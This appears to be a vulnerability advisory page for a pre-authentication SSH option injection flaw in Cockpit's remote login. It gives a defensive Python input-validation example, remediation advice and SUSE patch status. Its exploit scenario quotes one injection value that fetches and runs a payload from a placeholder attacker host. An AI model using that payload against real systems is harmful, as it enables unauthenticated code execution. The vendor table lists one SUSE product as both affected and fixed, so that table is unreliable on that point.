Severity by source
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from NVD.
CVSS Vector (NVD)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description (CVE.org)
Cockpit's remote login feature passes user-supplied hostnames and usernames from the web interface to the SSH client without validation or sanitization. An attacker with network access to the Cockpit web service can craft a single HTTP request to the login endpoint that injects malicious SSH options or shell commands, achieving code execution on the Cockpit host without valid credentials. The injection occurs during the authentication flow before any credential verification takes place, meaning no login is required to exploit the vulnerability.
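The missing step the description names is a validation of the hostname and username, and an argv-based invocation of ssh instead of a shell string. The following is an added illustration of such a check, not Cockpit's own code; the character whitelists, the `BatchMode` option and the `--` terminator are assumptions about what a hardened front end would do.

```python
import ipaddress
import re

# Constructed whitelists (assumptions, not Cockpit's rules): a hostname must
# be an IP literal or a DNS-style name; a username a POSIX-style login name.
# Both patterns require an alphanumeric first character, which rules out a
# value that ssh would otherwise parse as an option (anything starting "-").
HOST_RE = re.compile(r"[A-Za-z0-9]([A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")
USER_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def is_valid_host(host: str) -> bool:
    """Accept IPv4/IPv6 literals or plain DNS names; reject everything else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOST_RE.fullmatch(host) is not None


def is_valid_user(user: str) -> bool:
    """Reject whitespace, quotes, ';', '|', '$' and any other shell syntax."""
    return USER_RE.fullmatch(user) is not None


def build_ssh_argv(host: str, user: str) -> list[str]:
    """Return an argv list for ssh, or raise if either value fails validation.

    The list is meant for subprocess.run(argv) with no shell, so metacharacters
    in the values never reach an interpreter; "--" ends option parsing, so
    ssh cannot read the host as an option even if a check were bypassed.
    """
    if not is_valid_host(host):
        raise ValueError("rejected hostname")
    if not is_valid_user(user):
        raise ValueError("rejected username")
    return ["ssh", "-o", "BatchMode=yes", "-l", user, "--", host]
```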
Analysis (AI)
Remote code execution in Cockpit's web interface allows unauthenticated attackers to execute arbitrary commands on the host system by injecting malicious SSH options through the login endpoint. Affecting Red Hat Enterprise Linux versions 7 through 10, this critical pre-authentication vulnerability (CVSS 9.8) requires no credentials and executes code before any authentication checks occur. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
|---|---|
| Exploitation | Remote unauthenticated attacker with network access to Cockpit web service. … |
| Risk Assessment | This vulnerability represents critical real-world risk based on convergent threat signals. … |
| Exploit Scenario | An attacker identifies an internet-facing Red Hat Enterprise Linux server running Cockpit on the default port 9090 through network scanning. Without any valid credentials, the attacker crafts an HTTP POST request to the Cockpit login endpoint, supplying a malicious hostname parameter containing SSH ProxyCommand injection such as '-oProxyCommand=curl http://attacker.com/payload.sh|bash' or embedding shell metacharacters in the username field to break out of the SSH command context. … |
| Remediation | Organizations should immediately consult Red Hat's official security advisory at https://access.redhat.com/security/cve/CVE-2026-4631 for patched package versions and apply vendor-supplied updates through standard RHEL package management (yum/dnf update cockpit). … |
Recommended Action (AI)
Within 24 hours: Inventory all Cockpit deployments across RHEL 7-10 systems and immediately restrict network access to Cockpit web interface (default port 9090) to trusted networks only via firewall rules or network segmentation; disable Cockpit service on internet-facing systems if operationally feasible. …
Vendor Status
SUSE (severity: Critical)
| Product | Status |
|---|---|
| SUSE Liberty Linux 10 | Fixed |
| SUSE Liberty Linux 9 | Fixed |
| SUSE Linux Micro 6.2 | Fixed |
| openSUSE Tumbleweed | Fixed |
| SUSE Linux Enterprise Server 16.0 | Affected |
| SUSE Linux Enterprise Micro 5.2 | Fixed |
| SUSE Linux Enterprise Micro 5.3 | Fixed |
| SUSE Linux Enterprise Micro 5.4 | Fixed |
| SUSE Linux Enterprise Micro 5.5 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Micro 6.0 | Fixed |
| SUSE Linux Micro 6.1 | Fixed |
EUVD ID: EUVD-2026-19814